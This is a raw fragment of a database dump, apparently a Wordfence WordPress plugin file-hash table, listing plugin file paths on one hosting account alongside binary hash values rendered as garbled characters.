u١','wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';]`bkC@|','s9ӰCڙ9\Z\\=Y{;rM','',0,'?'),(')\0e_5=','wp-content/plugins/wordfence/lib/diffResult.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/diffResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gQ f7F','ҎE؊>^!j\0Oca^','',0,'?'),('#\n/PZ~h','wp-content/plugins/wordfence/lib/email_genericAlert.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/email_genericAlert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+I*kCe;PS','_\'\\qF0{ТF\r.OK','',0,'?'),('Fe 57[','wp-content/plugins/wordfence/lib/email_newIssues.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/email_newIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FzQ} 0',']ǛcI T)ͣxn%}ImFb','',0,'?'),('^u}G','wp-content/plugins/wordfence/lib/email_unlockRequest.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/email_unlockRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','΁~͟ak','u\Zg$}obĄ+\r\n8','',0,'?'),('e\0hLщ','wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YѱƔUy{','paivINa\'%fE?Mv','',0,'?'),('*Q. -c%D','wp-content/plugins/wordfence/lib/flags.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/flags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ic磭c-','8YCO0j{\ZxDĖxO','',0,'?'),('$-#q`l$Wۉ','wp-content/plugins/wordfence/lib/live_activity.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/live_activity.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i ks','^&Vb,sB^R4ѸV','',0,'?'),('dTofҷbS','wp-content/plugins/wordfence/lib/menu_dashboard.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/menu_dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H£{=7§x ','wڽþ$7!#XXI{@X{CO','',0,'?'),('ޒ?IΩi%gy','wp-content/plugins/wordfence/lib/menu_dashboard_options.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/menu_dashboard_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xUeҵS','H#݂yf6AU(714J2','',0,'?'),('WP旃^qy','wp-content/plugins/wordfence/lib/menu_firewall.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/menu_firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!%r\'NP-XϼA','`\n\\-j-dZ{%pj A','',0,'?'),('3dyjV','wp-content/plugins/wordfence/lib/menu_firewall_blocking.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/menu_firewall_blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@O<.<)$ޓ','\Zޛp >B*\'^T','',0,'?'),('Ͷjʃఱ-','wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d(ɪ\'G^e[ 1','sXrə{r.RX\0qΙ@','',0,'?'),('6cbkki3@H','wp-content/plugins/wordfence/lib/menu_firewall_waf.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/menu_firewall_waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m}#`:Po/','(˕=9L/*m,{o7ܺhVT\\','',0,'?'),('0dۦZP2o','wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xMg_zv7I',']/r^Q@떱w#4!','',0,'?'),('ԥd6g]QO#>','wp-content/plugins/wordfence/lib/menu_install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/menu_install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tLYN','V۽%#LJos\"M\\>6','',0,'?'),('WM{h(','wp-content/plugins/wordfence/lib/menu_options.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/menu_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UfMBz=sby','81*{*$','',0,'?'),('z8 L{q','wp-content/plugins/wordfence/lib/menu_scanner.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/menu_scanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8)Ջd J','.ٔGe!V*Ef2P?`fqP','',0,'?'),('I|K9 ({sX','wp-content/plugins/wordfence/lib/menu_scanner_credentials.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/menu_scanner_credentials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','. I\05AD<','ʅ<;Ҩ&I֘^dD(eX;;{','',0,'?'),('OHI!K!0[','wp-content/plugins/wordfence/lib/menu_scanner_options.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/menu_scanner_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','drmQ?NدE','0z!_N\\×\n~N|dsm','',0,'?'),('-jާ ~hyb','wp-content/plugins/wordfence/lib/menu_support.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/menu_support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AZå3ӹ1v*','+YܣW>A|\r&','wp-content/plugins/wordfence/lib/wfDiagnostic.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfDiagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3 zhy','ލ=QWbl恤8QP`O','',0,'?'),('F\ZC1P','wp-content/plugins/wordfence/lib/wfDict.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfDict.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y LZ!bEl','.{0Je{5- ~[T$Ğ','',0,'?'),('A0ff` Kǁ}','wp-content/plugins/wordfence/lib/wfDirectoryIterator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfDirectoryIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n+Z/_\Zxuv','u;IVa[~㵭TZ\\ ^yJj','',0,'?'),('X\';yfF','wp-content/plugins/wordfence/lib/wfFileUtils.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfFileUtils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1}o!8|O\'','jcORox&#A\\!njР,2̖r','',0,'?'),('q5@*=&\\X','wp-content/plugins/wordfence/lib/wfHelperBin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfHelperBin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';!ȍ4QX#','չ%-^qUqM eY','',0,'?'),('PM\ZI̸ݭY`r','wp-content/plugins/wordfence/lib/wfHelperString.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfHelperString.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Euƻ\\S w?,_L`',' iLƛw6_,n2SZh)','',0,'?'),('ikCT,','wp-content/plugins/wordfence/lib/wfIPWhitelist.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfIPWhitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2h2aE0','D:]踝zw%[joX`','',0,'?'),('1ϣ I','wp-content/plugins/wordfence/lib/wfImportExportController.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfImportExportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+>','dlы۹`J#|i{','',0,'?'),('eURϴ','wp-content/plugins/wordfence/lib/wfInaccessibleDirectoryException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfInaccessibleDirectoryException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3hZ-p{|','sʸl\n~f!teO[','',0,'?'),('mvyayT\"','wp-content/plugins/wordfence/lib/wfInvalidPathException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfInvalidPathException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jôٶ','G!U6Hk9J0Odv!','',0,'?'),('Vs\0','wp-content/plugins/wordfence/lib/wfIpLocation.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfIpLocation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s+̙gO;*XW',' jԚ6Ĕ- B1&+n','',0,'?'),('4\n2ߵ\"EGÉ','wp-content/plugins/wordfence/lib/wfIpLocator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfIpLocator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rrxB{&&','OoMU-؟\ZrsO}@','',0,'?'),('jsw2pqS','wp-content/plugins/wordfence/lib/wfIssues.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6\"r&@Nh','#?k->Lpk]uۺxU#} ','',0,'?'),('(>f0\Zg[|','wp-content/plugins/wordfence/lib/wfJWT.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfJWT.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}{ jNcK','0mhN`xx~HLjsOP,','',0,'?'),('!HufɁD7>=g','wp-content/plugins/wordfence/lib/wfLicense.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfLicense.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ot0LM{',',Q繧^7>;ٺf\ZFYK\'','',0,'?'),('ؠ]fP','wp-content/plugins/wordfence/lib/wfLockedOut.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfLockedOut.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z6/N ','\'${iP\'\ZTBP\"TM5 ]>','',0,'?'),('tDZ%F','wp-content/plugins/wordfence/lib/wfNotification.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfNotification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Ǎ V2(dhVD','SaYgj+| JM8','',0,'?'),('+3pU','wp-content/plugins/wordfence/lib/wfOnboardingController.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfOnboardingController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@]\"lܭr','3K z\ZomJPF <6\0','',0,'?'),('TоR\'{','wp-content/plugins/wordfence/lib/wfPersistenceController.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfPersistenceController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%kyiMO*','X(30\r\n\nPE̠ 9','',0,'?'),('mqPoD0*L','wp-content/plugins/wordfence/lib/wfRESTAPI.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfRESTAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\8H mi +','++Ɵ0͂b=[㜁','',0,'?'),('ތt+\\+XaZU','wp-content/plugins/wordfence/lib/wfScan.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfScan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4I}\Z2','J0xtodi Vd !','',0,'?'),('6XԪ4[_=t','wp-content/plugins/wordfence/lib/wfScanEngine.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfScanEngine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(A\Z˅ЩZ','Zdc&9xcV=Y(N','',0,'?'),('$H?.0h','wp-content/plugins/wordfence/lib/wfScanEntrypoint.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfScanEntrypoint.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+#F%IA','1M|Pk@m_WvA?vz','',0,'?'),('^JdcU+~','wp-content/plugins/wordfence/lib/wfScanFile.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfScanFile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J˰נb>A8','KE:y~;DOQ5','',0,'?'),('^G甝%','wp-content/plugins/wordfence/lib/wfScanFileLink.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfScanFileLink.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2%Ự嚃g@Ξ','\ZcBQVYNEgI%3O','wp-content/plugins/wordfence/lib/wfVersionCheckController.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfVersionCheckController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"4a%\nNa','P->Zm;Zmk]pVT>!','',0,'?'),('vTC','wp-content/plugins/wordfence/lib/wfVersionSupport.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfVersionSupport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fnr\r -Z&5g','E\neٓglb\"H9G','',0,'?'),('eŐnA','wp-content/plugins/wordfence/lib/wfView.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfView.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[ܺ-ˆN\n\\nO','x2Qmk٫@IFRhHu~R8\"zK4','',0,'?'),('v{Cҧ4I','wp-content/plugins/wordfence/lib/wfViewResult.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfViewResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z\"J3Zw','me= HoDOT\0v','',0,'?'),('iCC,+','wp-content/plugins/wordfence/lib/wfWebsite.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wfWebsite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t~AJao','AlET2 :$&b','',0,'?'),('ݡ=NxK`*','wp-content/plugins/wordfence/lib/wordfenceClass.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wordfenceClass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U\'tv','ɲ_SOMɤw/','',0,'?'),('kHm1`0ѹ_','wp-content/plugins/wordfence/lib/wordfenceConstants.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wordfenceConstants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZJ `>V','M5fȔBz=heYMSR[','',0,'?'),('X-4J_3','wp-content/plugins/wordfence/lib/wordfenceHash.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wordfenceHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܈\"=\nbcYwL','u3`)d}jQqo hߘԥ!|','',0,'?'),('z|*6S\\53','wp-content/plugins/wordfence/lib/wordfenceScanner.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wordfenceScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n\04B!)t|','m];G&9JPs`-#_hrK','',0,'?'),('h<]OpNCƴ','wp-content/plugins/wordfence/lib/wordfenceURLHoover.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/wordfenceURLHoover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0{C-.','5%꒛⁚d*<nԗҜNZz','',0,'?'),('6wr]*\\#','wp-content/plugins/wordfence/license.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B7&]NDd','@H M;ﺾ5 i\'o5V','',0,'?'),('Jl1','wp-content/plugins/wordfence/models/.htaccess','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/models/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\"xK{8dS','C\'r9@Kކtw#@k','',0,'?'),('`&%eFgd','wp-content/plugins/wordfence/models/block/wfBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/models/block/wfBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=L@ʐA','\nSY>l*ϸC@z&+ zdAWw\n\r','',0,'?'),('j4-O ՄrL\n','wp-content/plugins/wordfence/models/block/wfRateLimit.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/models/block/wfRateLimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$1D\'wm','E&&\na~b+\Z)jMpM','',0,'?'),('g]e!^(PK','wp-content/plugins/wordfence/models/common/wfTab.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/models/common/wfTab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2T}HW\'<}\\','Z¥|sS8e3Eؗ$ܜ-h','',0,'?'),('X~Vzl!_]/-3','wp-content/plugins/wordfence/models/firewall/wfFirewall.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/models/firewall/wfFirewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XC#BsTb','×GH5kӹrܰRR_x-','',0,'?'),('9XU7z','wp-content/plugins/wordfence/models/page/wfPage.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/models/page/wfPage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tbo i%HXwXv','ƅ1h/jw< U\\kq%s|W6','',0,'?'),('O܎$8Je','wp-content/plugins/wordfence/models/scanner/wfScanner.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/models/scanner/wfScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X)f.T',' 3/x\"Wh@fP\0]','',0,'?'),(',:3չC@~','wp-content/plugins/wordfence/modules/login-security/classes/.htaccess','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aabvr','C\'r9@Kކtw#@k','',0,'?'),('@={&}_','wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iCU5o\ZKS:','S~]-oC \'H[e7','',0,'?'),('/-TǻT<','',0,'?'),('@qG-$|','wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_wV-^+_9>','os/}$ _x\0u>','',0,'?'),('p\\*e\n\rψ','wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"cdxW{fNb','Oj+hŤ\nⵃ8Qܮ#w_pC','',0,'?'),('Vrz(nol*','wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')S4C@r\0\\Z','\0n bǻI꾊N܂ӠfRz','',0,'?'),('SCi1ۭj ','wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q! 41','%y\rގB_EKRkW\\v','',0,'?'),('& Ytz(\Z','wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z}R.%ƿ','Q䥏jT8\'rF 5c0E','',0,'?'),('HCTp(^l','wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٻB%(','FB[voΙF.ę@, `8+Z7t','',0,'?'),('L\Z|=c','wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B0oǔ','7/QƐՐwg:?#{sɟ','',0,'?'),('S g Nd','wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6\ZX k[rDZ','X>Vb* s9(\"h2G ','',0,'?'),('I>V]TTbW','wp-content/plugins/wordfence/modules/login-security/classes/model/2fainitializationdata.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/model/2fainitializationdata.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[yK89a6Ah','I6LA>6B:%~?:qhÉtcl','',0,'?'),('Wx\ZTa7{','wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1-ySkg','4\ZH+*P`,汹҄|*Վp','',0,'?'),('o1iL5z$7','wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u1\\8;#j-','P|l_Z3zy.~yK^)*f6F','',0,'?'),('\rz@_ÐmdM','wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','96f;0','mgc% i\ZnAB@wFz ;y`\rN','',0,'?'),('rY\0S(z|','wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g8EQmvOuTO','59T Q>|_BdÏ','',0,'?'),('c‹p PU3/','wp-content/plugins/wordfence/modules/login-security/classes/model/request.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/model/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&ܮM,~/r',' F;W]&z~o\'/q+','',0,'?'),('뱰6#|tĸ','wp-content/plugins/wordfence/modules/login-security/classes/model/script.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/model/script.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/+','Sݕˢn $Cj\ZD# ','',0,'?'),('2p)tI','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \0\">y>=','xVQ/}琾:(3&%UJoC','',0,'?'),('ǖd!s\0hahBS-','',0,'?'),('-_m q+1','wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h㠲ieɡ','IHMp\\Nh\n׈NF=-Z=hO','',0,'?'),('n0ߓv18g<]\'E#\\O@','',0,'?'),('-6Yw@i=','wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OhOH','wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ΓjNy8','UAMV\nPWkxu  /=','',0,'?'),('#:SkU{','wp-content/plugins/wordfence/modules/login-security/classes/model/view.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/model/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*:?l]u','2P탚=w=7Ar\nfQ~,B','',0,'?'),('O*m_)8_3','wp-content/plugins/wordfence/modules/login-security/classes/utility/array.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/array.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7. f+ {o','[5%b+r4ظi7+H\"B1','',0,'?'),('2h6͒\r~','wp-content/plugins/wordfence/modules/login-security/classes/utility/baseconversion.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/baseconversion.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Q\',\093','|\"`!CelUt|#oH$','',0,'?'),('Yr~Ҁ:$!','wp-content/plugins/wordfence/modules/login-security/classes/utility/databaselock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/databaselock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[{7DYhЧmf}\rf','\n?\raؐAL:, ={L5}+,','',0,'?'),('LC3 v-n{','wp-content/plugins/wordfence/modules/login-security/classes/utility/lock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/lock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cTG8`;','2S`J!N,}.ɧs0? #x','',0,'?'),('?\"&-j','wp-content/plugins/wordfence/modules/login-security/classes/utility/nulllock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/nulllock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!yNќz','ݩ\0$\no[\\q͞rv\"/','',0,'?'),('}N\\9\\','wp-content/plugins/wordfence/modules/login-security/classes/utility/number.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/number.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',2PEm','뇻9(TP#g\nQ k','',0,'?'),('% +곂4{:','wp-content/plugins/wordfence/modules/login-security/classes/utility/serialization.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/serialization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oѕbYR','tiioP7,R|qX)ᆊǮf@Kv ','',0,'?'),('vm^o9\\rth','wp-content/plugins/wordfence/modules/login-security/css/admin-global.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/css/admin-global.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n!m]\'x_','WIYTįQ.0(?Ff#|M','',0,'?'),('r<s;ٵii','wp-content/plugins/wordfence/modules/login-security/css/admin.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/css/admin.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JXlX +',':5Jpż  